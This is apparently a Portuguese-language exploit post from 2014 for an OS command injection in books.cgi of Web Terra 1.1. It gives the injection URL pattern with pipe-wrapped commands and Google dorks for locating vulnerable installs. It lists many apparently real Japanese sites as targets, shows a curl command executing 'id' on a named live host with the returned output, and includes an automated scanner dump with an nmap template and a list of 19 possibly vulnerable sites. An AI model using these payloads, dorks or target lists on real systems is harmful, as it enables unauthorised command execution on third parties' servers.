[+] Remote Comand Execution on books.cgi Web Terra v. 1.1[+] Date: 21/05/2014[+] CWE number: CWE-78[+] Risk: High[+] Author: Felipe Andrian Peixoto[+] Contact: [email protected][+] Tested on: Windows 7 and Linux[+] Vendor Homepage: http://www2.inforyoma.or.jp/~terra[+] Vulnerable File: books.cgi[+] Version : 1.1[+] Exploit: http://host/patch/books.cgi?file=|COMANDO|CGI é um acrónimo para a expressão inglesa Common Gateway Interface. Consiste numa importante tecnologia que permite gerar páginas dinâmicas, permitindo a um navegador passar parâmetros para um programa alojado num servidor web. Assim, designam-se por scripts CGI os pequenos programas que interpretam esses parâmetros e geram a página depois de os processar.O CGI foi concebido como o culminar de discussões por especialistas durante os primórdios da Internet, nomeadamente entre Rob McCool, John Franks, Ari Luotonen, George Phillips e Tony Sanders. DEmbora a linguagem tipicamente associada aos CGI seja o Perl, o CGI foi concebido de forma a ser independente da linguagem utilizada. Actualmente tecnologias como ASP.NET, PHP, Python e Ruby continuam a utilizar a especificação.
/DORK's:
------------------------------------------------------------------------------------------
inurl:*"/books.cgi?file=*"inurl:"/books.cgi?file="
inurl:"/books/" ext:cgi inurl:"books.cgi" "book1.txt"
------------------------------------------------------------------------------------------
Exemplo de achados:
http://www.hi-ho.ne.jp/cgi-bin/user/yyama/books.cgi?file=interbook.txt&subject=%E5%A5%AA%E6%8F%83%E9%81%9C%E5%A5%AA%E8%B6%B3%E6%9D%9F%E5%A5%AA%E7%AA%B6%E8%AC%82&start=2910
www.hi-ho.ne.jp/cgi-bin/user/yyama/books.cgi?file...txt...
http://ffg.sakura.ne.jp/ffg/book/081_120/books.cgi?file=book100.cgi&subject=%E7%AB%AA%5B%EF%BE%85%F3%BE%AC%9C&start=0
http://cgi.members.interq.or.jp/rabbit/hirotti/book/books.cgi?file=book13.txt&subject=%82%A4%82%E9%90%AF%81%7B%8C%A2%96%E9%8D%B3&start=240
http://nocturne.staba.jp/books/books.cgi?file=book2.txt&subject=%83V%83%8A%83A%83X%83X%83g%81%5B%83%8A%81%5B&start=19160
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book4.txt&subject=%82%B1%82%B1%82%EB%96%CD%97l&start=140
Comando CURL:
OS Command ('OS Command Injection')
curl -v 'http://redsuns.x0.com/webnovel/books.cgi?file=|id|'
0xResultado:
uid=1085(spider) gid=1000(users) groups=1000(users)
Usando [ SCANNER INURL ]
![Usando [ SCANNER INURL ]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvt6poYcQJTx6oTvd41W5m4K9tegZMY1t0KhAwg4Vzqg8a2Wuhc6mplyBFk5mqZhSM37Eb3mH007kzZNWZYSATrIszM2bLO-_o2ElIsAg299XUsQFhIVqQHCrG88llNT3Pt7HBN3oupgM/s1600/Captura+de+tela+de+2014-06-05+14:46:36.png "Usando [ SCANNER INURL ]")
DEBUG:
Array
(
[0] => Array
(
)
[host] => www.google.com.br
[dork] => inurl%3A%22%2Fbooks%2F%22+ext%3Acgi+inurl%3A%22books.cgi%22+%22book1.txt%22
[arquivo] => resultados.txt
[tipoerro] => 2
[exploit] =>
[achar] => 'a href=book'
[cmd] => nmap -sV -p 80,8080,21,22,3306 _ALVO_
[ipProxy] =>
[porta] =>
[url] => /search?q=inurl%3A%22%2Fbooks%2F%22+ext%3Acgi+inurl%3A%22books.cgi%22+%22book1.txt%22&num=1900&btnG=Search
[port] => 80
)
0xRESULTADO::
EXPLOIT USADO:
DORK: inurl%3A%22%2Fbooks%2F%22+ext%3Acgi+inurl%3A%22books.cgi%22+%22book1.txt%22
TOTAL DE POSSÍVEIS VULL: 19
ARQUIVO COM RESULTADO:resultados.txt
LISTA:
http://webcache.googleusercontent.com/search?q=cache:ovc5k7pkIrwJ:http://www2.pos.to/~fuyumi/tomonokai/cgi-bin/books.cgi?file%3Dbook1.txt%26subject%3D%26start%3D579%2Binurl:%22/books/%22+ext:cgi+inurl:%22books.cgi%22+%22book1.txt%22&num=1900&hl=pt-BR&&ct=clnk
http://ted.pekori.to/bbs/books/books.cgi?file=book1.txt&subject=%83%8A%83%8C%81%5B%8F%AC%90%E0%81E%96l%82%E7%82%CCPBM%94%92%8F%91&start=40
http://webcache.googleusercontent.com/search?q=cache:a2iYNKIzSvUJ:http://ted.pekori.to/bbs/books/books.cgi?file%3Dbook1.txt%26subject%3D%2583%258A%2583%258C%2581%255B%258F%25AC%2590%25E0%2581E%2596l%2582%25E7%2582%25CCPBM%2594%2592%258F%2591%26start%3D40%2Binurl:%22/books/%22+ext:cgi+inurl:%22books.cgi%22+%22book1.txt%22&num=1900&hl=pt-BR&&ct=clnk
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=820
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=280
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=240
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=840
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%96%B6%93%87%8C%DC%98Y&start=420
http://cgi.din.or.jp/~ah-san/books/books.cgi?file=book1.txt&subject=%E8%5E%8F%8F%90%5C%E8%5E%BDT%E8%5E%8F%83%96%8B%FA%AC%5C%E8%5E%8F%8F%90%5C%DC%98Y&start=100
http://taicho.oops.jp/cgi-bin/books/books.cgi?file=book1.txt&subject=Nature%81%40in%81%40Blood1&start=1120
http://taicho.oops.jp/cgi-bin/books/books.cgi?file=book1.txt&subject=Nature%81%40in%81%40Blood1&start=1020
http://www.wao.or.jp/user/take123/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%83R%83%8D%83%93
http://www.scorpion.ne.jp/~kaimu/cgi-bin/books.cgi?file=book1.txt&subject=%8C%8E%82%CC%8D%CA
http://www6.airnet.ne.jp/tangent/novel/books.cgi?file=book1.txt&subject=%8AC%94n%8F%B2%82%CC%8E%96%8C%8F%95%EB
http://www.kcn.ne.jp/cgi-bin/blue/books.cgi?file=book1.txt&subject=%A5%B3%A1%BC%A5%B8
http://hccweb1.bai.ne.jp/~apaaf603/main/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%82%A0%82%AE%82%E9
http://mbl.myftp.biz/~sgon/tryhp/books1/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%93c%8C%E1%8D%EC
http://taicho.oops.jp/cgi-bin/books/books.cgi?file=book1.txt&subject=Nature%81%40in%81%40Blood1&start=1240
http://www.gifunisi.jp/cgi/books/books.cgi?file=book1.txt&subject=%96%BC%92T%92%E3%8F%BC%93c%97D%8D%EC
SCRIPT INURL
http://pastebin.com/TzijC99y
Mais informações sobre falhas desse tipo:
http://cwe.mitre.org/data/definitions/78.html
EXPLOIT:
http://www.exploit-db.com/exploits/33494/
Ref:
http://thobias.org/doc/cgi_shell.html
